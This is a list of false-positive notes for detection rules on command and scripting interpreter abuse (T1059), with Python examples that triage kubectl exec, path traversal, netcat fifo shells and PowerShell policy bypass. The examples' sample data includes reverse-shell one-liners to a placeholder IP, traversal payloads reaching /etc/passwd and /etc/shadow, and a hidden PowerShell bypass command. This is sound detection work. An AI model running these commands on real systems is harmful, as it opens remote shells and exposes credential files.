LoFP / t1059

t1059

false-positive notes collected from detection rules tagged with this technique, one note per line:
a network operator or systems administrator may utilize an automated host discovery application that may generate false positives. filter as needed.
a new cloudshell may be created by a system administrator.
admin activity
administrative activity
administrative script libraries
administrative scripts
administrative scripts that use the same keywords.
administrator script
administrator scripts
administrators may attempt to change the default execution policy on a system for a variety of reasons. however, setting the policy to "unrestricted" or "bypass", which this search is designed to identify, would be unusual. hits should be reviewed and investigated as appropriate.
administrators may use the command prompt for regular administrative tasks. it's important to baseline your environment for network connections being made from the command prompt to determine any abnormal use of this tool.
administrators or installed processes that leverage nohup
administrators or power users may use this powershell commandlet for troubleshooting.
administrators, administrative actions or certain applications may run many instances of taskhost and taskhostex concurrently. filter as needed.
amazon ssm document worker
an administrator may need to exec into a pod for a legitimate reason such as debugging. containers built from linux and windows os images tend to include debugging utilities, so an admin may choose to run commands inside a specific container with kubectl exec ${pod_name} -c ${container_name} -- ${cmd} ${arg1} ${arg2} ... ${argn}. for example, the following command can be used to look at logs from a running cassandra pod: kubectl exec cassandra -- cat /var/log/cassandra/system.log . additionally, the -i and -t arguments might be used to run a shell connected to the terminal: kubectl exec -i -t cassandra -- sh
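the note above separates routine exec activity (an admin reading a log) from the interactive-shell case (-i -t ... -- sh). the following is an added example, not code from the LoFP page or from any rule it quotes, that triages pods/exec events from the kubernetes api audit log. it assumes the standard audit event fields (user.username, verb, objectRef, requestURI) and that kubectl passes the exec parameters in the requestURI query string; the allowlist of users per namespace and the three sample audit lines are constructed.

```python
"""Triage kubectl exec activity from Kubernetes API audit events.

Added example; not part of the LoFP page or of any rule it quotes. Assumes
the standard audit event layout and that exec parameters (command, container,
stdin, tty) arrive in the requestURI query string. Allowlist and sample
events below are constructed.
"""
import json
from urllib.parse import parse_qs, urlparse

# Constructed allowlist: user -> namespaces where exec is expected admin work.
EXEC_ALLOWLIST = {
    "sre-oncall@example.com": {"default", "kube-system"},
}

# Binaries that turn an exec into an interactive shell when tty=true.
SHELLS = {"sh", "bash", "ash", "dash", "zsh"}

# Constructed audit lines: an on-call SRE reading a log, an unknown identity
# opening an interactive shell, and an unrelated pod GET that must be ignored.
SAMPLE_AUDIT_LINES = [
    json.dumps({
        "verb": "create",
        "user": {"username": "sre-oncall@example.com"},
        "objectRef": {"resource": "pods", "subresource": "exec",
                      "namespace": "default", "name": "cassandra"},
        "requestURI": "/api/v1/namespaces/default/pods/cassandra/exec"
                      "?command=cat&command=%2Fvar%2Flog%2Fcassandra%2Fsystem.log"
                      "&container=cassandra&stdout=true&stderr=true",
    }),
    json.dumps({
        "verb": "create",
        "user": {"username": "ci-deployer"},
        "objectRef": {"resource": "pods", "subresource": "exec",
                      "namespace": "default", "name": "cassandra"},
        "requestURI": "/api/v1/namespaces/default/pods/cassandra/exec"
                      "?command=sh&container=cassandra&stdin=true"
                      "&stdout=true&stderr=true&tty=true",
    }),
    json.dumps({
        "verb": "get",
        "user": {"username": "ci-deployer"},
        "objectRef": {"resource": "pods", "namespace": "default",
                      "name": "cassandra"},
        "requestURI": "/api/v1/namespaces/default/pods/cassandra",
    }),
]


def parse_exec(event):
    """Return the exec parameters of a pods/exec event, or None otherwise."""
    ref = event.get("objectRef", {})
    if ref.get("resource") != "pods" or ref.get("subresource") != "exec":
        return None
    query = parse_qs(urlparse(event.get("requestURI", "")).query)
    command = query.get("command", [])  # one 'command' entry per argv element
    tty = query.get("tty", ["false"])[0] == "true"
    return {
        "user": event.get("user", {}).get("username", ""),
        "namespace": ref.get("namespace"),
        "pod": ref.get("name"),
        "container": query.get("container", [None])[0],
        "command": command,
        "tty": tty,
        # The case the note singles out: a shell attached to a terminal.
        "interactive_shell": bool(command)
        and command[0].rsplit("/", 1)[-1] in SHELLS
        and tty,
    }


def classify(event):
    """Return (verdict, details) where verdict is ignore, baseline or alert."""
    details = parse_exec(event)
    if details is None:
        return "ignore", None
    if details["namespace"] in EXEC_ALLOWLIST.get(details["user"], set()):
        return "baseline", details
    return "alert", details


def triage(lines):
    """Classify a sequence of JSON audit lines."""
    return [classify(json.loads(line)) for line in lines]


if __name__ == "__main__":
    for verdict, details in triage(SAMPLE_AUDIT_LINES):
        print(verdict, details)
```

the allowlist is keyed on user and namespace rather than on the pod name, because the pod name changes with every rollout while the identity doing the debugging does not; the interactive_shell flag is kept separately so that an allowlisted user opening a tty shell can still be routed to review rather than silently baselined.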
application installers might contain scripts as part of the installation process.
appvclient
an automation scripting language may be used by a network operator to perform ldap queries.
be aware of potential false positives: legitimate uses of the /webauth_operation.php endpoint may cause benign activity to be flagged. the url in the analytic is specific to a successful attempt to exploit the vulnerability. review the contents of the http body to determine whether the request is malicious. if the request is benign, add the url to the whitelist or continue to monitor.
benign administrative tasks can also trigger alerts, necessitating a firm understanding of the typical system behavior and precise tuning of the analytic to reduce false positives.
ccm
certain kinds of security testing may trigger this alert. powershell scripts that use high levels of obfuscation or have unusual script block payloads may trigger this alert.
citrix configsync.ps1
command execution on a virtual machine may be done by a system or network administrator. verify whether the username, hostname, and/or resource name should be making changes in your environment. command execution from unfamiliar users or hosts should be investigated. if known behavior is causing false positives, it can be exempted from the rule.
custom organization-specific macos packages that use .pkg files to run curl could trigger this rule. if known behavior is causing false positives, it can be excluded from the rule.
depending on the scripts, this rule might require some initial tuning to fit the environment
direct powershell command execution through sqlps.exe is uncommon; a child process sqlps.exe spawned by sqlagent.exe is a legitimate action.
direct powershell command execution through sqltoolsps.exe is uncommon; a child process sqltoolsps.exe spawned by smss.exe is a legitimate action.
the directories /dev/shm and /run/shm are temporary file storage directories in linux. they are intended to appear as a mounted file system but use virtual memory instead of a persistent storage device, and they are mounted for legitimate purposes.
false positives are expected with legitimate sources
false positives vary depending on the score threshold you check against: the higher the count of path traversal strings in a request, the more reliable the hit.
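the note above treats the number of traversal sequences in a request as a score and leaves the threshold to the analyst. the following is an added example, not code from the LoFP page or from any rule it quotes, that computes that score over constructed request paths, percent-decoding first so that encoded and double-encoded sequences (%2e%2e%2f, %252e%252e%252f) and backslash variants count the same as a plain ../; the threshold and sample requests are assumptions.

```python
"""Score web requests by path-traversal sequence count.

Added example; not from the LoFP page or any rule it quotes. Sample
requests are constructed. The decoding is bounded so a pathological input
cannot loop, and backslashes are unified with slashes so Windows-style
traversal counts as well.
"""
import re
from urllib.parse import unquote

TRAVERSAL = re.compile(r"\.\./")


def normalize_path(raw, max_rounds=3):
    """Percent-decode until the value stops changing (at most max_rounds)."""
    cur = raw
    for _ in range(max_rounds):
        decoded = unquote(cur)
        if decoded == cur:
            break
        cur = decoded
    return cur.replace("\\", "/")


def traversal_score(raw):
    """Number of '../' segments after normalisation; 0 for clean paths."""
    return len(TRAVERSAL.findall(normalize_path(raw)))


# Constructed requests: clean, a single benign relative link, plain traversal,
# single-encoded, double-encoded, and a backslash (%5c) variant.
SAMPLE_REQUESTS = [
    "/static/js/app.js",
    "/docs/../index.html",
    "/download?file=../../../../etc/passwd",
    "/download?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "/api/%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/shadow",
    "/search?q=..%5c..%5c..%5cwindows%5cwin.ini",
]


def flag_requests(requests, threshold):
    """Return (request, score) for every request at or above the threshold."""
    flagged = []
    for req in requests:
        score = traversal_score(req)
        if score >= threshold:
            flagged.append((req, score))
    return flagged


if __name__ == "__main__":
    for req, score in flag_requests(SAMPLE_REQUESTS, threshold=3):
        print(score, req)
```

with a threshold of 1 the single ../ in a relative documentation link is flagged too; raising it to 3 keeps only the requests that walk several directories up, which is the trade-off the note describes.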
false positives are expected from legitimate applications generating events that are similar to those generated by malicious activity. for example, event id 1122 is generated when a process attempts to load a dll that is blocked by an asr rule. this can be triggered by legitimate applications that attempt to load dlls that are not blocked by asr rules. this is block only.
false positives are not expected with this analytic, since it is a hunting analytic. it is meant to show the use of asr rules and how they can be used to detect malicious activity.
false positives depend on scripts and administrative tools used in the monitored environment
false positives may be high based on legitimate scripted code in any environment. filter as needed.
false positives may be present, and filtering will need to occur by parent process or command line argument. it may be necessary to adapt this query to an edr product for more granular coverage.
false positives may be present based on legacy applications or utilities. win32_scheduledjob uses the remote procedure call (rpc) protocol to create scheduled tasks on remote computers. it uses the dcom (distributed component object model) infrastructure to establish a connection with the remote computer and invoke the necessary methods. the rpc service needs to be running on both the local and remote computers for the communication to take place.
false positives may be present if a suspicious processname is similar to a benign processname.
false positives may be present if the application is legitimately used, filter by user or endpoint as needed.
false positives may be present when an administrator utilizes the cmdlets in the query. filter or monitor as needed.
false positives may be present, but most likely not. filter as needed.
false positives may only pertain to it not being related to empire, but another framework. filter as needed if any applications use the same pattern.
false positives might occur if the users are unaware of such control checks
false positives should be limited as day to day scripts do not use this method.
false positives should be limited as there is a small subset of binaries that contain the original file name of ab.exe. filter as needed.
false positives should be limited, however it is possible to filter by processes.process_name and specific processes (ex. wscript.exe). filter as needed. this may need modification based on edr telemetry and how it brings in registry data. for example, removal of (default).
false positives should be limited. filter as needed.
false positives should be very limited as this is strict to metasploit behavior.
false positives will be found. http and https are url protocol handlers that will trigger this analytic. tune based on process or command line.
false positives will be present based on many factors. tune the correlation as needed to reduce too many triggers.
false positives will be present if any scripts are adding to inprocserver32. filter as needed.
false positives will only be present if the windbg process legitimately spawns autoit3. filter as needed.
false-positives (fp) should be at a minimum with this detection as pid files are meant to hold process ids, not inherently be executables that spawn processes.
github operations such as ghe-backup
go utilities that use staaldraad awesome ntlm library
high
in rare administrative cases, this function might be used to check network connectivity
inline scripting can be used by some rare third party applications or administrators. investigate and apply additional filters accordingly
it is possible administrators or scripts may run these commands, filtering may be required.
it is possible there will be false positives, filter as needed.
java tools are known to produce false positives when loading libraries
legitimate administration script
legitimate administrative script
legitimate administrative scripts
legitimate browser install, update and recovery scripts
legitimate certificate exports by administrators. additional filters might be required.
legitimate commands in .lnk files
legitimate exchange system administration activity.
legitimate powershell scripts that make use of psreflect to access the win32 api
legitimate powershell scripts that make use of these functions.
legitimate powershell scripts which makes use of compression and encoding.
legitimate powershell web access installations by administrators
legitimate process can have this combination of command-line options, but it's not common.
legitimate scheduled tasks may be created during installation of new software.
legitimate script
legitimate scripts that use iex
legitimate software that uses these patterns
legitimate software uses the scripts (preinstall, postinstall)
legitimate tools that accidentally match on the searched patterns
legitimate usage of dsinternals for administration or audit purpose.
legitimate usage of remote powershell, e.g. for monitoring purposes.
legitimate usage of remote powershell, e.g. remote administration and monitoring.
legitimate usage of the unsafe option
legitimate use
legitimate use via a batch script or by an administrator.
legitimate use by an administrator
legitimate use by vm administrator
legitimate use of pester for writing tests for powershell scripts and modules
legitimate use of remote powershell execution
legitimate use of screenconnect
legitimate use of screenconnect. disable this rule if screenconnect is heavily used.
legitimate use remote powershell sessions
legitimate use to pass password to different powershell commands
legitimate use via a batch script or by an administrator.
legitimate users and processes, such as system administration tools, may utilize shell utilities inside a container resulting in false positives.
likely
likely. many admin scripts and tools launch powershell from their bat or vb scripts, which may trigger this rule often. it is best to add additional filters or use this to hunt for anomalies
limited false positives may be present. filter as needed based on initial analysis.
limited false positives. filter as needed.
limited false positives. may filter as needed.
limited to no known false positives.
many benign applications will create processes from executables in windows\temp, although unlikely to exceed the given threshold. filter as needed.
microsoft operations manager (mom)
microsoft sccm
microsoft windows installers leveraging rundll32 for installation.
moderate-to-low; despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.
msp detection searcher
need tuning applocker or add exceptions in siem
netcat and openssl are common tools used for establishing network connections and creating encryption keys. while they are popular, capturing the stdout and stderr in a named pipe pointed to a shell is anomalous.
netcat is a dual-use tool that can be used for benign or malicious activity. netcat is included in some linux distributions so its presence is not necessarily suspicious. some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.
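the two notes above draw the line between netcat or openssl on their own (dual-use, baseline it) and a named pipe wired between a shell and a network tool (anomalous). the following is an added example, not code from the LoFP page or from any rule it quotes, that applies that distinction to process command lines: it looks for a fifo that is created and then reused in redirections, a shell, a pipe, and a network tool, and only reports the combination. the command lines are constructed and the regexes are this example's own.

```python
"""Separate fifo-backed reverse shells from ordinary netcat/openssl use.

Added example; not from the LoFP page or any rule it quotes. Sample
command lines are constructed. Matching is on the command line only, so
it is a triage aid, not proof of execution.
"""
import re

# nc/ncat/netcat as a word, or openssl's client subcommand.
NET_TOOL = re.compile(r"(?<![\w-])(?:nc|ncat|netcat)\b|\bopenssl\s+s_client\b")
# sh/bash/ash/dash/zsh as a standalone word or path component (not ssh, not -sh).
SHELL = re.compile(r"(?<![\w-])(?:ba|z|da|a)?sh\b")
# mkfifo <path> or mknod <path> p; stop the path at shell metacharacters.
MKFIFO = re.compile(r"\bmk(?:fifo|nod)\s+([^\s;|&<>]+)")


def analyze(cmdline):
    """Return verdict and the evidence that produced it."""
    fifo = MKFIFO.search(cmdline)
    fifo_path = fifo.group(1) if fifo else None
    # A fifo that is created and then wired into redirections or a pipe is
    # referenced at least twice; a daemon creating its own fifo names it once.
    fifo_reused = bool(fifo_path) and cmdline.count(fifo_path) >= 2
    net = bool(NET_TOOL.search(cmdline))
    shell = bool(SHELL.search(cmdline))
    piped = "|" in cmdline
    if fifo_reused and net and shell and piped:
        verdict = "fifo_reverse_shell"
    elif net:
        verdict = "netcat_dual_use"   # baseline against known automation
    else:
        verdict = "benign"
    return {"verdict": verdict, "fifo": fifo_path, "fifo_reused": fifo_reused,
            "net_tool": net, "shell": shell, "piped": piped}


# Constructed command lines: the classic nc fifo shell, an openssl variant,
# a port check, key generation, and a service creating its own fifo.
SAMPLE_CMDLINES = [
    "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 203.0.113.7 4444 > /tmp/f",
    "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 203.0.113.7:443 > /tmp/s",
    "nc -z -w 2 db.internal 5432",
    "openssl genrsa -out /etc/ssl/private/app.key 2048",
    "mkfifo /var/run/app/events.fifo",
]


def triage(cmdlines):
    """Verdict per command line, in input order."""
    return [analyze(c)["verdict"] for c in cmdlines]


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(analyze(cmd)["verdict"], "<-", cmd)
```

the requirement that the fifo path appear more than once is what keeps a daemon's own mkfifo out of the alert; the netcat_dual_use verdict is the bucket the second note says to baseline rather than alert on.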
the network service account name in a localization not covered by the rule
noise and false positives can be seen if the instant messaging application in question is allowed within the corporate network. in this case, a filter is needed.
not known at this moment.
note that false positives may occur due to the use of the enable-psremoting cmdlet by legitimate users, such as system administrators. it is recommended to apply appropriate filters as needed to minimize the number of false positives.
other programs that use these command line options and accept an 'all' parameter
other scripts
other tools or scripts may use this to change the code page to utf-* or another encoding
other tools that incidentally use the same command line parameters
other tools that work with encoded scripts in the command line instead of script files
planned windows defender configuration changes.
potential for some third party applications to disable amsi upon invocation. filter as needed.
powershell and windows command shell are often observed as legit child processes of the jetbrains teamcity service and may require further tuning.
powershell may use this function to process compressed data.
powershell may use this function to store output objects in memory.
powershell remoting is a dual-use protocol that can be used for benign or malicious activity. it's important to baseline your environment to determine the amount of noise to expect from this tool.
powershell scripts running as system user
powershell scripts that download content from the internet
powershell scripts that use this capability for troubleshooting.
programs using powershell directly without invocation of a dedicated interpreter.
python libraries that use a flag starting with "-c". filter according to your environment
scripts or tools that download files
security audits, maintenance, and network administrative scripts may trigger this alert when run under web processes.
software installers that pull packages from remote systems and execute them
some false positives are expected in environments that use this functionality to install and test custom applications
some false positives may arise in some environments and may require tuning. add additional filters or reduce the level depending on the amount of noise
some installers might generate a similar behavior. an initial baseline is required
some powershell installers were seen using similar combinations. apply filters accordingly
the build engine is commonly used by windows developers but use by non-engineers is unusual.
there are circumstances where an application may legitimately execute and interact with the windows command-line interface. investigate and modify the lookup file, as appropriate.
there are no known false positives for this search, but it could contain false positives, as multiple detections can trigger without successful exploitation. modify the static value distinct_detection_name to a higher value. it is also necessary to tune the analytics that are also tagged to ensure the volume never becomes too high.
there may be legitimate reasons to bypass the powershell execution policy. the powershell script being run with this parameter should be validated to ensure that it is legitimate.
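the note above and the earlier one on "unrestricted"/"bypass" both come down to the same triage: pull the requested policy out of the command line, and validate the script that runs under it. the following is an added example, not code from the LoFP page or from any rule it quotes, that does this for process command lines. it handles the -ExecutionPolicy parameter, including the -ep and -ex aliases and the prefix abbreviations powershell.exe accepts, and a Set-ExecutionPolicy inside -Command text; the known-script allowlist and the five sample command lines are constructed.

```python
"""Triage PowerShell execution-policy overrides in process command lines.

Added example; not the page's or any rule's own code. Covers the
-ExecutionPolicy parameter (with the -ep/-ex aliases and the unambiguous
prefixes powershell.exe accepts) and Set-ExecutionPolicy inside -Command.
The known-script allowlist and sample command lines are constructed.
"""
import re

RISKY_POLICIES = {"bypass", "unrestricted"}
SET_POLICY = re.compile(
    r"set-executionpolicy\s+(?:-executionpolicy\s+)?['\"]?([a-z]+)", re.I)

# Constructed allowlist of scripts validated to run with a relaxed policy
# (lower-case full paths).
KNOWN_SCRIPTS = {r"c:\scripts\backup.ps1"}

# Constructed command lines: a validated backup job, a hidden-window bypass
# launching a file from a world-writable path, a RemoteSigned inventory
# script, a persistent policy change, and an encoded command with no policy
# argument at all (a separate detection's business).
SAMPLE_CMDLINES = [
    r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
    r'powershell -ep bypass -w hidden -nop -c "Start-Process C:\Users\Public\update.exe"',
    r'powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1',
    r'powershell.exe -Command "Set-ExecutionPolicy Unrestricted -Scope LocalMachine -Force"',
    r'powershell.exe -NonInteractive -EncodedCommand ZABpAHIA',
]


def _is_param(token, full, aliases=(), min_len=3):
    """True if token is -<alias> or an unambiguous prefix of -<full>."""
    if not token.startswith("-"):
        return False
    name = token[1:].strip("\"'").lower()
    return name in aliases or (len(name) >= min_len and full.startswith(name))


def extract_policy(cmdline):
    """Lower-case policy requested on the command line, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_param(tok, "executionpolicy", aliases=("ep", "ex")):
            return tokens[i + 1].strip("\"'").lower()
    m = SET_POLICY.search(cmdline)
    return m.group(1).lower() if m else None


def extract_script(cmdline):
    """Lower-case value of -File (or an accepted prefix of it), or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_param(tok, "file", min_len=1):
            return tokens[i + 1].strip("\"'").lower()
    return None


def triage(cmdline):
    """ok: no risky policy; baseline: risky policy but validated script; flag: review."""
    policy = extract_policy(cmdline)
    if policy not in RISKY_POLICIES:
        return "ok"
    if extract_script(cmdline) in KNOWN_SCRIPTS:
        return "baseline"
    return "flag"


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(triage(cmd), extract_policy(cmd), extract_script(cmd), "<-", cmd)
```

only the script path, not the policy value, is allowlisted: a validated backup.ps1 under Bypass is baseline, while the same policy with an inline -Command or an unknown file stays flagged, which is the validation step the note asks for. the -ExecutionPolicy:Value colon form and policies set via environment or group policy are outside what this example parses.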
these characters might be legitimately on the command-line, but it is not common.
this detection may also be triggered by legitimate applications and numerous service accounts, which often end with a $ sign. to manage this, it's advised to check the service account's activities and, if they are valid, modify the filter macro to exclude them.
trusted solarwinds child processes. verify process details such as network connections and file writes.
unlikely
use of get-command and get-help modules to reference invoke-webrequest and start-bitstransfer.
used by microsoft sql server management studio
used by some .net binaries, minimal on user workstation.
valid changes to the startup script
valid usage of s3 browser for iam loginprofile listing and/or creation
valid usage of s3 browser for iam user and/or accesskey creation
valid usage of s3 browser with accidental creation of default inline iam policy without changing default s3 bucket name placeholder value
very special / sneaky powershell scripts
windows defender atp
windows firewall can be disabled by a system administrator. verify whether the user identity, user agent, and/or hostname should be making changes in your environment. windows profile being disabled by unfamiliar users should be investigated. if known behavior is causing false positives, it can be exempted from the rule.
winrm